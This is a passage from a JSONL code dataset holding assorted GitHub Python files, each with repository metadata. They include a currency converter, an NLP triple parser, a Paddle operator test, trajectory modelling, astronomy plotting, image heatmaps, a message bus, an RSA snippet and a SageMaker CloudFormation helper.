offset\n\n\ndef affiche_mois(indice, offset):\n return\n# *-----------------------------------\n# on utilise affiche mois pour afficher les mois de 1 à 12.\n","repo_name":"Pierre-OlivierB/ibm-python-day3","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3764,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2977567539","text":"import requests\nimport json\n\n# Get input currency from user.\ncurrent_code = input().lower()\n\n# Create a cache dictionary for used rates.\ncache = {'usd': 0, 'eur': 0}\n\n# Loop for continue checking.\nwhile True:\n target_code = input().lower()\n if not target_code:\n break\n money = int(input())\n\n # Get currency rates from server.\n response = requests.get(f\"http://www.floatrates.com/daily/{current_code}.json\")\n json_str = response.content.decode('utf-8')\n rates_json = json.loads(json_str)\n\n # Cache desired results\n rates = ['usd', 'eur']\n for r in rates:\n try:\n cache[r] = rates_json[r]['rate']\n except KeyError:\n continue\n\n # Convert money and print result.\n print(\"Checking the cache...\")\n if target_code in cache:\n print(\"Oh! It is in the cache!\")\n rate = cache[target_code]\n else:\n print(\"Sorry, but it is not in the cache!\")\n # Update cache with new code retrieved.\n rate = rates_json[target_code]['rate']\n cache[target_code] = rate\n \n conv_money = round(money * rate, 2)\n print(f\"You received {conv_money} {target_code.upper()}.\")\n\n\n\n","repo_name":"facufrau/beginner-projects-solutions","sub_path":"hyperskill_projects/currency_converter/currency_converter-6-6.py","file_name":"currency_converter-6-6.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32831771211","text":"\"\"\"\nCreate Parser object that can Parse Question and Document\n\"\"\"\nimport spacy\nfrom spacy.tokens import Span\nfrom spacy.matcher import PhraseMatcher, Matcher\nimport inflect\nimport re\n\nclass Parser(object):\n def __init__(self, text, custom_pipe):\n self.text = text\n self.nlp = custom_pipe.nlp\n\n def docParse(self):\n \"\"\"\n To parse the whole documents but only for simple sentences at the moment.\n Return a list of triples of Subject-Verb-Object (SVO)\n \"\"\"\n text = self.text\n text = self.simplify(text)\n nlp = self.nlp\n full_doc = nlp(text)\n \n # Slit into sentences and find Simple sentences\n sent_doc_ls = list(sent for sent in full_doc.sents)\n spl_ls = self.simple_find(sent_doc_ls)\n doc_ls = list(nlp.pipe(spl_ls))\n\n print(\"Finding triples (Subject-Verb-Object) from your doc...\\n\")\n # Our triples will be (ent1, rel, ent2)\n triples = self.all_triples(doc_ls) \n return triples\n\n def questionParse(self):\n \"\"\"\n To parse question only. \n Return a set of entities ents_set and a set of relations rels_set\n \"\"\"\n text = self.text\n text = text.lower()\n nlp = self.nlp\n doc = nlp(text)\n print(\"Finding entities set and relations set...\\n\")\n ents_set = set(str(ent) for ent in doc.ents)\n rels_list = self.get_relation(doc)\n rels_set = set(str(rel[-1]) for rel in rels_list)\n return ents_set, rels_set\n\n def get_relation(self, doc):\n \"\"\"\n Parsing a doc object to find the Relations (\"key verbs\")\n Return a set of relations rels_set (, )\n \"\"\"\n nlp = self.nlp\n # Matcher class object \n matcher = Matcher(nlp.vocab)\n\n #define the pattern (both patterns will be looking for a VERB followed by a PREPOSITION)\n ROOT_pattern = [{'DEP':'ROOT'}, \n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'DEP':'acomp','OP':\"?\"},\n ] \n\n acl_pattern = [{'DEP':'acl'}, \n {'DEP':'prep','OP':\"?\"},\n {'DEP':'agent','OP':\"?\"},\n {'DEP':'acomp','OP':\"?\"},\n ]\n\n relations = []\n matcher.add(\"relations\", None, ROOT_pattern, acl_pattern)\n # After the matcher is added, let's run on our Doc to see what it can find\n matches = matcher(doc)\n\n # Store it in the relations list\n for match_id, start, end in matches:\n matched_span = doc[start:end]\n relation_tuple = (start, matched_span.lemma_)\n relations.append(relation_tuple)\n\n # Check if there is duplication, we will remove the duplication\n # Examples: \"determine\" and \"determine by\" will both be relations but we only need the longer one\n for start, relation1 in relations:\n if len(relation1.split()) != 1:\n continue\n else:\n # comparing our 1st relation to our 2nd relation \n for _, relation2 in relations:\n # if 2nd relation also 1 word, won't be a duplicate\n if len(relation2.split()) == 1:\n continue\n # if 1st relation is a substring of 2nd relation --> duplicate\n if relation2.find(relation1) != -1:\n relations.remove((start, relation1))\n break\n return relations\n\n def simplify(self, text):\n \"\"\"\n Remove all 'a', 'the' from the text since this is not important to build the KG.\n Also remove '\\n' and '=' which is used to format the sub-headings\n Also turn all to lowercase.\n Also remove all texts within brackets (those adding extra information)\n Also clean up 'he she we they this these those that' since we have yet found a way to parse earlier info.\n \"\"\"\n text = text.lower()\n to_replace_with_space = [' a ', ' the ', ' he ', ' she ', ' we ', ' they ', ' this ', ' that ', ' these ', ' those ']\n to_remove = ['\\n', '=']\n source = text\n source = re.sub(\" [\\(\\[].*?[\\)\\]]\", \"\", source)\n source = re.sub(\"[=].*? [=]\", \"\", source)\n for dummy in to_remove:\n source = source.replace(dummy, '')\n # clean up period as this punctuation get a bit messy after all the previous replacements\n n = 3\n for i in range(n):\n dummy = '.' + ' '*(n-i)\n source = source.replace(dummy, '.')\n source = source.replace('.', '. ')\n for dummy in to_replace_with_space:\n source = source.replace(dummy, ' ')\n return source\n \n def simple_find(self, doc_ls):\n \"\"\"\n Only to find Simple sentences to parse.\n Currently ignore Compound and Complex sentences\n Return a list of string object for Simple sentence spl_text_ls.\n \"\"\"\n spl_text_ls = []\n\n for doc in doc_ls:\n is_simple = False\n nsubj_tok = [tok for tok in doc if tok.dep_ == \"nsubj\" or tok.dep_ == \"nsubjpass\"]\n mark_tok = [tok for tok in doc if tok.dep_ == \"mark\"]; \n\n if len(nsubj_tok) == 1 and len(mark_tok) == 0:\n is_simple = True\n\n if is_simple == True:\n spl_text_ls.append(doc.string.strip())\n\n return spl_text_ls\n\n def all_triples(self, doc_ls):\n \"\"\"\n Find all triples from the document object\n Return a list of triples\n \"\"\"\n triples = []\n for doc in doc_ls:\n ent_rel_list = self.ordered_entity_relation(doc)\n triple = self.find_triple(ent_rel_list)\n triples += triple \n return triples\n\n def ordered_entity_relation(self, doc):\n '''\n Parse a `doc` object and return entities and the relations between them in order\n '''\n ent_list = []; relation_list = []\n for ent in doc.ents:\n ent_tuple = (ent.end - 1, ent.lemma_, \"ents\")\n ent_list.append(ent_tuple)\n\n relations = self.get_relation(doc)\n for start, relation in relations:\n relation_tuple = (start, relation, \"rels\")\n relation_list.append(relation_tuple)\n\n combined_list = ent_list + relation_list\n ordered_list = sorted(combined_list, key=lambda x: x[0])\n # check ordered list for tuple of ents follow by rels:\n # if ents.end >= rels.start, False, remove relations\n n = len(ordered_list)\n remove_list = []\n for i in range(n-1):\n tuple1 = ordered_list[i]\n tuple2 = ordered_list[i+1]\n if tuple1[-1] == 'ents' and tuple2[-1] == 'rels':\n if tuple1[0] >= tuple2[0]:\n remove_list.append(tuple2)\n for trash in remove_list:\n ordered_list.remove(trash)\n ordered_list = sorted(ordered_list, key=lambda x: x[0])\n return ordered_list\n\n\n def find_triple(self, ent_rel_list):\n '''\n Filter only entities that have relation between them. And return a list of tuples of (ent1, rel, ent2).\n This is hardecoded and only work well for simple sentence.\n '''\n l = len(ent_rel_list)\n span = 3\n triple = []\n\n for i in range(l-span+1):\n ind1 = ent_rel_list[i]\n ind2 = ent_rel_list[i + 1]\n ind3 = ent_rel_list[i + 2]\n\n if ind1[-1] == 'ents' and ind2[-1] == 'rels' and ind3[-1] == 'ents':\n triple_tuple = (ind1[1], ind2[1], ind3[1])\n triple.append(triple_tuple)\n\n return triple","repo_name":"TNBL265/NLPQueryBot","sub_path":"QueryParserApp/KeywordsParser.py","file_name":"KeywordsParser.py","file_ext":"py","file_size_in_byte":7717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10571459142","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass ScalarModel(nn.Module):\n def __init__(self, input_size, hidden_size):\n super(ScalarModel, self).__init__()\n self.loss = nn.MSELoss(reduction=\"none\")\n\n self.fc1 = nn.Linear(input_size, hidden_size)\n self.fc2 = nn.Linear(hidden_size, hidden_size)\n self.fc3 = nn.Linear(hidden_size, 1)\n\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n","repo_name":"Kabumba/PhysicsLearner","sub_path":"ScalarModel.py","file_name":"ScalarModel.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16835500747","text":"from __future__ import print_function, division\n\nimport numpy as np\nimport unittest\nimport sys\nsys.path.append(\"..\")\nfrom op_test import OpTest, skip_check_grad_ci\nimport paddle\npaddle.enable_static()\n\n\nclass TestNPUReciprocal(OpTest):\n def setUp(self):\n self.op_type = \"reciprocal\"\n self.set_npu()\n self.init_dtype()\n\n np.random.seed(1024)\n x = np.random.uniform(1, 2, [11, 17]).astype(self.dtype)\n out = np.reciprocal(x)\n\n self.inputs = {'X': OpTest.np_dtype_to_fluid_dtype(x)}\n self.outputs = {'Out': out}\n\n def test_check_output(self):\n self.check_output_with_place(self.place)\n\n def test_check_grad(self):\n self.check_grad_with_place(\n self.place, ['X'], 'Out', max_relative_error=0.01)\n\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n\n def init_dtype(self):\n self.dtype = np.float32\n\n\nclass TestNPUReciprocalFp64(TestNPUReciprocal):\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n\n def init_dtype(self):\n self.dtype = np.float64\n\n\n@skip_check_grad_ci(\n reason=\"The backward test is not supported for float16 type on NPU.\")\nclass TestNPUReciprocalFp16(TestNPUReciprocal):\n def set_npu(self):\n self.__class__.use_npu = True\n self.place = paddle.NPUPlace(0)\n self.__class__.no_need_check_grad = True\n\n def init_dtype(self):\n self.dtype = np.float16\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"EnnSou/ooss-paddle2.3","sub_path":"python/paddle/fluid/tests/unittests/npu/test_reciprocal_op_npu.py","file_name":"test_reciprocal_op_npu.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"33456093454","text":"from flask import Blueprint, jsonify\n\nfrom services.ftx import list_markets, get_price\n\nftx_bp = Blueprint('ftx_bp', __name__)\n\n\n@ftx_bp.route('')\ndef list_market():\n stocks = list_markets()\n return jsonify(stocks['result'])\n\n\n@ftx_bp.route('')\ndef get_market(market):\n market = market.replace('---', '/')\n stock = get_price(market)\n return jsonify(stock['result'])\n","repo_name":"StephaneConq/TradingToolBack","sub_path":"blueprints/ftx.py","file_name":"ftx.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15574447575","text":"import numpy as np\nimport copy\nimport math\nimport map_processor\n\n\nclass TrajectoryProcessor(map_processor.MapProcessor):\n def __init__(self, n_x_lattice):\n super().__init__(n_x_lattice)\n self.transition_mat = None\n \n def generate(self, len_traj):\n if self.transition_mat is None:\n print(\"you must initially load\")\n \n traj = []\n \n start = self._choice()\n \n for i in range(len_traj):\n \n traj.append(start)\n \n cur_posi = np.zeros((1, self.size))\n cur_posi[0, start] = 1\n dist = np.dot(cur_posi, self.transition_mat)\n \n if dist.sum() == 0:\n continue\n \n next_posi = np.random.choice(range(self.size), p=dist[0])\n \n start = next_posi\n return traj \n \n def compute_possible_set(self, prior, delta=0):\n \n if delta == 0:\n \n state_nos = np.where(prior>0)[0]\n n_possible_loc = len(state_nos)\n #print(\"n_possible_loc\", n_possible_loc)\n \n return state_nos\n \n else:\n \n state_nos, delta_X = self.compute_delta_set(prior, delta)\n return state_nos\n \n def update_graph_mat(self, possible_states):\n updated_graph_mat = copy.deepcopy(self.graph_mat)\n for state in range(len(updated_graph_mat)):\n if state not in possible_states:\n updated_graph_mat[state,:] = 0\n updated_graph_mat[:, state] = 0\n \n return updated_graph_mat\n \n def compute_delta_set(self, prior, delta):\n \n temp_prior = copy.deepcopy(prior)\n \n while (np.sum(temp_prior) > 1-delta):\n\n temp_prior[temp_prior == 0] = float(\"inf\")\n min_ind = np.argmin(temp_prior)\n min_prob = prior[min_ind]\n temp_prior[min_ind] = 0\n temp_prior[temp_prior == float(\"inf\")] = 0\n \n if np.sum(temp_prior != 0) == 0:\n break\n \n if prior[min_ind] > 0:\n temp_prior[min_ind] = min_prob\n \n n_possible_loc = np.sum(temp_prior>0)\n \n \n deltaX = np.zeros((n_possible_loc, self.size))\n \n state_nos = np.where(temp_prior>0)[0]\n for i, state_no in enumerate(state_nos):\n deltaX[i,state_no] = 1\n \n return state_nos, deltaX\n \n \n def compute_posterior_distribution(self, prior):\n if self.transition_mat is None:\n print(\"you must initially load\")\n \n posterior = np.dot(prior, self.transition_mat)\n \n if posterior.sum() == 0:\n print(\"end\")\n \n return posterior\n \n def traj_to_states(self, traj):\n state_traj = []\n for latlon in traj:\n if not self._is_in_from_latlon(latlon):\n continue\n state = self._find_nearest_state_from_latlon_in_all_states(latlon)\n state_traj.append(state)\n return state_traj\n \n def trajs_to_state_trajs(self, trajs):\n state_trajs = []\n for traj in trajs:\n state_traj = self.traj_to_states(traj)\n if len(state_traj) != 0:\n state_trajs.append(state_traj)\n return state_trajs\n \n def make_transmat_from_state_trajs(self, state_trajs):\n transition_mat = np.zeros((self.n_state, self.n_state))\n for state_traj in state_trajs:\n pre_state = state_traj[0]\n for state in state_traj[1:]:\n transition_mat[pre_state, state] += 1\n pre_state = state\n self.transition_mat = self._normalize(transition_mat)\n \n def make_transmat_from_trajs(self, trajs):\n transition_mat = np.zeros((self.n_state, self.n_state))\n for traj in trajs:\n pre_state = self._find_nearest_state_from_latlon_in_all_states(traj[0])\n for latlon in traj:\n if self._is_in_from_latlon(latlon):\n state = self._find_nearest_state_from_latlon_in_all_states(latlon)\n transition_mat[pre_state, state] += 1\n \n pre_state = state\n else:\n break \n self.transition_mat = self._normalize(transition_mat)\n \n def _normalize(self, transition_mat):\n transition_mat = copy.deepcopy(transition_mat)\n for i, transition_prob in enumerate(transition_mat):\n sum_ = np.sum(transition_prob)\n if sum_ != 0:\n transition_mat[i,:] = transition_mat[i,:]/sum_\n return transition_mat\n \n \n def load_trans_mat(self, path_transition_mat, traj, threashold=1e-4):\n \n transition_mat = np.loadtxt(path_transition_mat)\n self.transition_mat = self._threash(transition_mat, threashold)\n self._modify_for_test_traj(traj)\n self.size = len(self.transition_mat)\n \n \n def _threash(self, transition_mat, threashold):\n transition_mat = copy.deepcopy(transition_mat)\n transition_mat = transition_mat * (transition_mat >= threashold)\n transition_mat = self._normalize(transition_mat)\n return transition_mat\n \n \n def _modify_for_test_traj(self, test_traj):\n for i in range(len(test_traj) - 1):\n pre_loc = test_traj[i]\n pos_loc = test_traj[i+1]\n if pre_loc != pos_loc:\n self.transition_mat[pre_loc][pos_loc] += 0.1","repo_name":"tkgsn/PGLP","sub_path":"src/trajectory_processor.py","file_name":"trajectory_processor.py","file_ext":"py","file_size_in_byte":5645,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"5329192380","text":"from kapteyn import maputils\nimport numpy\nfrom service import *\n\nfignum = 35\nfig = plt.figure(figsize=figsize)\nframe = fig.add_axes(plotbox)\ntitle = r\"\"\"COBE quadrilateralized spherical cube projection (CSC) oblique with:\n$(\\alpha_p,\\delta_p) = (0^\\circ,30^\\circ)$, $\\phi_p = 75^\\circ$ also: \n$(\\phi_0,\\theta_0) = (0^\\circ,90^\\circ)$. (Cal. fig.34d)\"\"\"\nheader = {'NAXIS' : 2, 'NAXIS1': 100, 'NAXIS2': 80,\n 'CTYPE1' : 'RA---CSC',\n 'CRVAL1' : 0.0, 'CRPIX1' : 85, 'CUNIT1' : 'deg', 'CDELT1' : -4.0,\n 'CTYPE2' : 'DEC--CSC',\n 'CRVAL2' : 30.0, 'CRPIX2' : 40, 'CUNIT2' : 'deg', 'CDELT2' : 4.0,\n 'LONPOLE': 75.0,\n 'PV1_1' : 0.0, 'PV1_2' : 90.0,\n }\nX = numpy.arange(0,370.0,30.0)\nY = numpy.arange(-60,90,30.0)\nf = maputils.FITSimage(externalheader=header)\nannim = f.Annotatedimage(frame)\ngrat = annim.Graticule(axnum= (1,2), wylim=(-90,90.0), wxlim=(-180,180),\n startx=X, starty=Y)\ngrat.setp_lineswcs0(0, lw=2)\ngrat.setp_lineswcs1(0, lw=2)\n# Take border from non-oblique version\nheader['CRVAL2'] = 0.0\ndel header['PV1_1']\ndel header['PV1_2']\ndel header['LONPOLE']\nborder = annim.Graticule(header, axnum= (1,2), wylim=(-90,90.0), wxlim=(-180,180),\n skipx=True, skipy=True)\nperimeter = getperimeter(border)\nlon_world = list(range(0,360,30))\nlat_world = [-60, -30, 30, 60]\nlabkwargs0 = {'color':'r', 'va':'center', 'ha':'left'}\nlabkwargs1 = {'color':'b', 'va':'top', 'ha':'center'}\ndoplot(frame, fignum, annim, grat, title,\n lon_world=lon_world, lat_world=lat_world,\n labkwargs0=labkwargs0, labkwargs1=labkwargs1,\n perimeter=perimeter, markerpos=markerpos)\n","repo_name":"kapteyn-astro/kapteyn","sub_path":"doc/source/EXAMPLES/allskyf35.py","file_name":"allskyf35.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"12489151931","text":"'''\nCreate attention heatmaps per paragraph sentence for all images,\nheatmaps are created with objects which were linked with noun phrase,\none can choose which linking method to take and visualise (check parameters in the main loop).\n'''\n\nimport argparse\nimport base64\nimport json\nimport tqdm\nimport numpy as np\n\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import figure\nimport cv2\n\nimport spacy\nspacy_nlp = spacy.load('en_core_web_sm')\n\n\n\ndef image_box_resize(image,\n bboxes):\n\n \"\"\"Resize bounding boxes from original coordinates to the scaled ones.\n Args:\n image: original image\n bboxes: (x, y, xmax, ymax) coordinates of bounding boxes\n Returns:\n img: original image, resized (scaled)\n boxes_scaled: newly scaled bounding boxes\n \"\"\"\n\n boxes_scaled = []\n image_to_show = cv2.imread(image, 3)\n y_dim = image_to_show.shape[0]\n x_dim = image_to_show.shape[1]\n target_size = 2000\n x_scale = target_size / x_dim\n y_scale = target_size / y_dim\n img = cv2.resize(image_to_show, (target_size, target_size))\n img = np.array(img)\n for box in bboxes:\n origleft, origtop, origright, origbottom = box[0], box[1], box[2], box[3]\n x_scaled = int(np.round(origleft * x_scale))\n y_scaled = int(np.round(origtop * y_scale))\n xmax = int(np.round(origright * x_scale))\n ymax = int(np.round(origbottom * y_scale))\n boxes_scaled.append([x_scaled, y_scaled, xmax, ymax])\n return (\n img,\n boxes_scaled\n )\n\n\n\n\ndef image_vis(this_image,\n boxes_to_visualise,\n all_boxes,\n sent_id,\n image_path,\n save_path):\n\n \"\"\"Visualisation of linked bounding boxes on top of the image.\n Args:\n this_image: image id\n boxes_to_visualise: ids of linked bounding boxes\n all_boxes: coordinates of original bounding boxes\n sent_id: current sentence id in the paragraph\n image_path: path to ADE20k images\n Returns:\n saves heatmaps per sentence per image\n \"\"\"\n\n # open correct image; val image ids are > 100000\n this_image = int(this_image)\n if this_image > 100000:\n this_image = this_image - 100000\n val_this_image = \"%08d\" % (this_image,)\n val_this_image = f'ADE_val_{str(val_this_image)}.jpg'\n image = image_path + str(val_this_image)\n else:\n train_this_image = \"%08d\" % (this_image,)\n train_this_image = f'ADE_train_{str(train_this_image)}.jpg'\n image = image_path + str(train_this_image)\n boxes_filtered = [all_boxes[k] for k in boxes_to_visualise]\n # transform last two values in each box into xmax and ymax\n transformed_boxes = []\n for (x_coord, y_coord, width, height) in boxes_filtered:\n xmax = x_coord + width\n ymax = y_coord + height\n transformed_boxes.append([x_coord, y_coord, xmax, ymax])\n # adjust bounding boxes based on the resized image\n img_rescaled, boxes_rescaled = image_box_resize(image, transformed_boxes)\n # controlling how stretched the bounding box should be\n figure(figsize=(12, 18), dpi=80)\n plt.axis('off')\n plt.tight_layout()\n img = Image.fromarray(img_rescaled)\n white_img = 255 * np.ones((img.size[1], img.size[0] , 3), np.uint8)\n plt.imshow(white_img)\n for bbox in boxes_rescaled:\n if bbox[0] == 0:\n bbox[0] = 1\n if bbox[1] == 0:\n bbox[1] = 1\n plt.gca().add_patch(\n plt.Rectangle((bbox[0], bbox[1]),\n (bbox[2] - bbox[0]) - bbox[0],\n (bbox[3] - bbox[1]) - bbox[1], fill=True,\n linewidth=2, alpha=1, color='#00008B')\n )\n\n sid = str(int(sent_id) + 1)\n plt.savefig(f'{save_path}/s{sid}-' + str(this_image) + '.jpg')\n plt.close()\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument('-f',\n '--feat_path',\n help='Path to the image features',\n default='/scratch/nikolai/tmm_dataset/frcnn_tellmemore/',\n required=False)\n parser.add_argument('-i',\n '--image_path',\n help='Path to the tell me more images',\n default='/scratch/nikolai/tmm_dataset/tell_me_more/',\n required=False)\n parser.add_argument('-l',\n '--linking_method_type',\n help='Choose linking method to visualise;\\\n full set can be found in res_formatted.json',\n default='L-(A)(N)-1-M',\n required=False)\n parser.add_argument('-m',\n '--filter_method',\n help='Pick a filtering method that was used with linking,\\\n they should be identical',\n default='(A)(N)',\n required=False)\n parser.add_argument('-r',\n '--results_file',\n help='Path to the file with formatted results of linking',\n default='./res_formatted_run-20220813-162422.json',\n required=False)\n parser.add_argument('-o',\n '--output_path',\n help='Path to save heatmaps for all images for the specific sentence id',\n default='./where',\n required=False)\n args = vars(parser.parse_args())\n\n with open(args['results_file'], 'r', encoding='UTF-8') as a:\n links = json.load(a)\n\n for num, (image_id, v) in tqdm.tqdm(enumerate(links.items())):\n feat_file = args['feat_path'] + str(image_id) + '.npz'\n feat_loaded = np.load(feat_file)\n boxes = np.frombuffer(base64.b64decode(feat_loaded['boxes']),\n dtype=np.float32).reshape(36, 4).copy()\n nps = v['NPS-OBJ']\n objs = v[f'{args[\"linking_method_type\"]}']\n # per sentence\n for sentid in range(5):\n nouns = [(iid, i[1]) for iid, i in enumerate(nps) if i[0] == sentid]\n noun_ids = [iid for iid, i in nouns]\n objids = []\n for p in noun_ids:\n if isinstance(objs[str(p)], list):\n for pp in objs[str(p)]:\n if pp != 'NONE':\n objids.append(pp)\n else:\n if objs[str(p)] != 'NONE':\n objids.append(objs[str(p)])\n boxes_to_show = [k for (k, kk) in v[f'{args[\"filter_method\"]}']]\n boxes_to_show_for_sent = [i for i in boxes_to_show if i in objids]\n image_vis(image_id,\n boxes_to_show_for_sent,\n boxes,\n sentid,\n args['image_path'],\n args['output_path'])\n","repo_name":"GU-CLASP/discourse-and-decodings","sub_path":"scripts/where_vis.py","file_name":"where_vis.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39370779376","text":"import logging\nfrom typing import Callable, Type\n\nfrom tenacity import Retrying, RetryError\nfrom tenacity.stop import stop_after_attempt\nfrom tenacity.wait import wait_exponential\n\nfrom app.domain import events, commands\nfrom app.service_layer import handlers, unit_of_work\n\n\nMessage = commands.Command | events.Event\nlogger = logging.getLogger(__name__)\n\n\ndef handle(message: Message, uow: unit_of_work.AbstractUnitOfWork):\n results = []\n queue = [message]\n \n while queue:\n\n if isinstance(message, events.Event):\n handle_event(message, queue=queue, uow=uow)\n\n elif isinstance(message, commands.Command):\n cmd_result = handle_command(message, queue=queue, uow=uow)\n results.append(cmd_result)\n\n else:\n raise Exception(f\"{message} was not an Event or Command\")\n\n return results\n\n\ndef handle_event(event: events.Event, queue: list[Message], uow: unit_of_work.AbstractUnitOfWork):\n for handler in EVENT_HANDLERS[type(event)]:\n try:\n for attempt in Retrying(stop=stop_after_attempt(3), wait=wait_exponential()):\n\n with attempt:\n logger.debug(f\"handling event {event} with handler {handler}\")\n handler(event, uow=uow)\n queue.extend(uow.collect_new_events())\n\n except RetryError as retry_failure:\n logger.exception(f\"Не получилось обработать событие {retry_failure.last_attempt.attempt_number} раз, отказ !\")\n continue\n\n\ndef handle_command(command: command.Command, queue: list[Message], uow: unit_of_work.AbstractUnitOfWork):\n logger.debug(f\"handling command {command}\")\n \n try:\n handler = COMMAND_HANDLERS[type(command)]\n result = handler(command, uow=uow)\n queue.extend(uow.collect_new_events())\n return result\n except Exception:\n logger.exception(f\"Exception handling command {command}\")\n raise\n\n\ndef send_out_of_stock_notification(event: events.OutOfStock):\n email.send_mail(\n \"stock@made.com\",\n f\"Артикула {event.sku} нет в наличии.\",\n )\n\n\nEVENT_HANDLERS: dict[Type[events.Event], list[Callable]] = {\n events.OutOfStock: [send_out_of_stock_notification],\n}\n\n\nCOMMAND_HANDLERS: dict[Type[commands.Command], Callable] = {\n commands.Allocate: handlers.allocate,\n commands.CreateBatch: handlers.add_batch,\n commands.ChangeBatchQuantity: handlers.change_batch_quantity,\n}\n\n","repo_name":"maximovd/architecture-patterns-python","sub_path":"app/service_layer/messagebus.py","file_name":"messagebus.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27611912436","text":"from email import message\nimport rsa\n\npublicKey, privateKey = rsa.newkeys(512)\n\nmessage = \"Hello Promesa\"\n\nencMessage = rsa.encrypt(message.encode(), publicKey)\n\nprint(\"Original String: \", message)\nprint(\"Encrypted String: \", encMessage)\n\ndecMessage = rsa.decrypt(encMessage, privateKey).decode\n\n","repo_name":"iampromesa/PYTHON-PROJECTS","sub_path":"RELEARNING/encrypt.py","file_name":"encrypt.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13926488868","text":"import main\nfrom interface.types import type_extension\nfrom interface.standard import Save_file, Validate_format\nfrom fastapi import UploadFile, File\nfrom pathlib import Path\nimport os\nimport shutil\nfrom helpers.text import convert_pdf_to_text, convert_docx_to_text, convert_pptx_to_text, convert_rtf_to_text, convert_text_to_object, clean_text\n\ndef save_file(file: UploadFile = File(...)) -> Save_file:\n is_valid_format = validate_format(str(file.filename))\n if is_valid_format.status:\n file_destination = Path(main.url_location, \"static\", \"documents\", file.filename)\n if not os.path.exists(file_destination):\n os.makedirs(os.path.dirname(file_destination), exist_ok=True)\n with open(file_destination, \"wb\") as buffer:\n shutil.copyfileobj(file.file, buffer)\n return Save_file(status= True, url_file= file_destination)\n return Save_file(status= False, url_file= '')\n\ndef validate_format(extension_name:str) -> Validate_format:\n status = False\n type_file = ''\n for ext in type_extension:\n if extension_name.endswith(type_extension[ext]):\n status = True\n type_file = type_extension[ext]\n break\n return Validate_format(status=status, type_file= type_file)\n\ndef file_converter(url_file:Path):\n file = validate_format(str(url_file))\n if file.status:\n if file.type_file == type_extension['PDF']:\n text = convert_pdf_to_text(url_file)\n elif file.type_file == type_extension['WORD']:\n text = convert_docx_to_text(url_file)\n elif file.type_file == type_extension['PWP']:\n text = convert_pptx_to_text(url_file)\n elif file.type_file == type_extension['RTF']:\n text = convert_rtf_to_text(url_file)\n return convert_text_to_object(clean_text(text))","repo_name":"quiku2021/wiku","sub_path":"helpers/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7647663089","text":"\"\"\"Custom CloudFormation Resource to describe details of an existing SMStudio domain\n\nYou might want to do this if you:\n- Know a SageMaker Studio domain is present but don't know its ID\n- Need to know some other attribute not listed in AWS::SageMaker::Domain outputs\n\nhttps://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-sagemaker-domain.html\n\nThis resource will fail if no SMStudio domain is present in the region, or a DomainID is passed which does\nnot exist.\n\"\"\"\n\n# Python Built-Ins:\nimport logging\nimport traceback\n\n# External Dependencies:\nimport boto3\nimport cfnresponse\n\nsmclient = boto3.client(\"sagemaker\")\n\n# The set of DescribeDomain response props that will be passed through to cfn output:\nSUPPORTED_PROPS = {\n \"DomainArn\",\n \"DomainId\",\n \"DomainName\",\n \"HomeEfsFileSystemId\",\n \"SingleSignOnManagedApplicationInstanceId\",\n \"Status\",\n \"AuthMode\",\n \"DefaultUserSettings\",\n \"AppNetworkAccessType\",\n \"HomeEfsFileSystemKmsKeyId\",\n \"SubnetIds\",\n \"Url\",\n \"VpcId\",\n \"KmsKeyId\",\n}\n\ndef lambda_handler(event, context):\n try:\n request_type = event[\"RequestType\"]\n if request_type == \"Create\":\n handle_create(event, context)\n elif request_type == \"Update\":\n handle_update(event, context)\n elif request_type == \"Delete\":\n handle_delete(event, context)\n else:\n cfnresponse.send(\n event,\n context,\n cfnresponse.FAILED,\n {},\n error=f\"Unsupported CFN RequestType '{request_type}'\",\n )\n except Exception as e:\n logging.error(\"Uncaught exception in CFN custom resource handler - reporting failure\")\n traceback.print_exc()\n cfnresponse.send(\n event,\n context,\n cfnresponse.FAILED,\n {},\n error=str(e),\n )\n raise e\n\n\nclass NoStudioDomains(RuntimeError):\n pass\n\n\ndef infer_domain_id():\n domains_resp = smclient.list_domains()\n if \"NextToken\" in domains_resp:\n logging.warning(\n f\"Ignoring NextToken on sagemaker:ListDomains response - pagination not implemented\"\n )\n domain_ids = [d[\"DomainId\"] for d in domains_resp[\"Domains\"]]\n\n if not (len(domain_ids) > 0):\n # If the domain has been deleted, the user must necessarily have been 